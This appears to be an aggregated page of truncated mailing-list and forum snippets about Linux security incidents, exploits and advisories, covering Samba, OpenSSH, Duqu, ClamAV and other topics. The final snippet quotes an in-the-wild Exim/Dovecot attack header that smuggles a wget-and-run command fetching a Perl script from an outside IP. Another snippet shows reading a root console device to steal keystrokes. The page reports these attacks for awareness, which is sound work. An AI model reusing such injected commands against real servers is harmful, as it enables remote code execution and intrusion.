similar to: Kulak exploit

... By my mistake a 2.2.8a-1 running on RH8 was exposed to the Internet. It was cracked in a matter of hours. I noticed it because they've deleted my smbd. :-| I'm ready to reinstall the machine, if there are any logs that anybody is interested into please say it now.

There's an article on slashdot about the Duqu team wiping all their intermediary c&c servers on 20 Oct. Interestingly, the report says that they were all (?) not only linux, but CentOS. There's a suggestion of a zero-day exploit in openssh-4.3, but both the original article, and Kaspersky labs (who have a *very* interesting post of the story) consider that highly unlikely, and the

A few weeks ago, I upgraded Samba 3.0.1x to 3.0.14a . After the upgrade, all completed printjobs on all 40 printers stayed in samba's print queue (they were removed from the unix-printqueue). When I installed 3.0.20rc2, everything back to normal. But since the upgrade this weekend to 3.0.20, the same thing happens again: no jobs were removed from the samba printerqueue's. Removing

https://bugzilla.redhat.com/show_bug.cgi?id=432251 Mentioned on Slashdot here: http://it.slashdot.org/article.pl?sid=08/02/10/2011257 Fedora bug report here: https://bugzilla.redhat.com/show_bug.cgi?id=432229 -- MELVILLE THEATRE ~ Melville Sask ~ http://www.melvilletheatre.com

Suppose I have a CentOS 5.7 machine running the default Apache with no extra modules enabled, and with the "yum-updatesd" service running to pull down and install updates as soon as they become available from the repository. (Assume further the password is strong, etc.) On the other hand, suppose that as the admin, I'm not subscribed to any security alert mailing lists which send

I seem to have stumbled across another vulnerability in DIP. It appears to allow any user to gain control of arbitrary devices in /dev. For instance, I have successfully stolen keystrokes from a root login as follows... (I could also dump characters to the root console) $ whoami cesaro $ cat < /dev/tty1 <------ root login here bash: /dev/tty1: Permission denied

I just noticed (at least on OpenSSH 3.0p1) that even though I have both RSA and DSA keys available in sshd_config on a server, only a ssh-rsa line shows up in known_hosts on the client side, not a ssh-dss line (that priority may come from the fact that my RSA key is listed before my DSA key in sshd_config). If I comment out the RSA key in sshd_config and restart the server, then the next time the

(Sorry, third time -- last one, promise, just giving it a subject line!) OK, a second machine hosted at the same hosting company has also apparently been hacked. Since 2 of out of 3 machines hosted at that company have now been hacked, but this hasn't happened to any of the other 37 dedicated servers that I've got hosted at other hosting companies (also CentOS, same version or almost),

With companies like Facebook and Google offering cash prizes for people who can find security holes in their products, has there ever been any consideration given to offering cash rewards to people finding security exploits in CentOS or in commonly bundled services like Apache? (Provided of course they follow "responsible disclosure" and report the exploit to the software authors

As is my routine every couple of weeks, I ran Pest Patrol anti-spyware software, and was disturbed to find it came back saying that the file FLAC/COPYING.FDL was a security exploit known as "Virus Tutorial" or VTool/jul2. This has left me wondering if FLAC is to be trusted. Here's what PestPatrol's web site has to say about it: Exploit: A way of breaking into a system. An

On Thu, 2015-02-05 at 16:39 -0600, Valeri Galtsev wrote: > >>> > >>> -rw-r--r-- 1 root root 1220 Jan 31 03:04 shadow > Be it me, I would consider box compromised. All done on/from that box > since probable day it happened compromised as well. If there is no way to > establish the day, then since that system originally build. With full > blown sweeping up

As described here: http://lists.grok.org.uk/pipermail/full-disclosure/2013-July/091084.html If I understand this correctly our accept filters will have zero effect on stopping this exploit, correct?

Hi, We're running samba 3.0.25a as a PDC on FreeBSD 6.1 in our office and few weeks ago, our samba PDC (and soon all the service hosted on this server) stop responding suddenly :-/ Everything went back to normal as soon as we disconnected from the network, all the hosts that were in the same room as the 10.0.0.20 host (after asking the domain user connected at that moment to this host, do

Hello. Recently I discovered some kind of exploit of openssh used against me. For configuration info, I am using Mandrake 8.2 with the openssh package openssh-3.1p1-1mdk. Fortunately, I was at least somewhat security-aware, and have an AllowUsers parameter in my sshd config file. I Used to allow only public key logins, but ditched that when I found myself needing access from multiple places. I

[mod: This discussion has been going on "offline" with an occasional CC to linux-security. By the time I got around to do another "moderation round" this one was the latest. Everyone is keeping good context, so I think you all will be able to follow the discussion. --REW] >>>>> <seifried@seifried.org> writes: >> The only thing I can see coming out

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ______________________________________________________________________________ Caldera International, Inc. Security Advisory Subject: Linux - Telnet AYT remote exploit Advisory number: CSSA-2001-030.0 Issue date: 2001, August 10 Cross reference: ______________________________________________________________________________ 1. Problem

An interesting exploit: https://scarybeastsecurity.blogspot.com/2016/12/redux-compromising-linux-using-snes.html While this is tailored to Fedora 25 (with Chrome) and Ubuntu 16.04, in checking my CentOS 7 system I find that it is not vulnerable simply because it doesn't have the libgme used by gstreamer-plugins-bad to make it work. However, gstreamer-plugins-bad-free is indeed installed,

////usr/lib/kde3/kfile_ps.so: Exploit.Linux.Gv FOUND ////usr/lib/kde3/gsthumbnail.so: Exploit.Linux.Gv FOUND ////usr/lib/libgs.so.7.07: Exploit.Linux.Gv FOUND ////usr/lib/libkghostviewlib.so.0.0.0: Exploit.Linux.Gv FOUND I start the procmail process and a mail with those lines appears on my inbox (with subject "Virus found"), i'm running clamd too, but i dont know if this files

I saw that there is a local root exploit in the wild. http://blog.kagesenshi.org/2008/02/local-root-exploit-on-wild.html And I see my centos box still has: 2.6.18-53.1.4.el5 yum says there are no updates... am I safe? Valent.

One of our readers wrote in to let us know that he had received an attempted Exim/Dovecot exploit attempt against his email server. The exploit partially looked like this: From: x`wget${IFS}-O${IFS}/tmp/crew.pl${IFS}50.xx.xx.xx/dc.txt``perl${IFS}/tmp/crew.pl`@blaat.com (Obviously edited for your safety, and I didn't post the whole thing.) This is an exploit against Dovecot that is using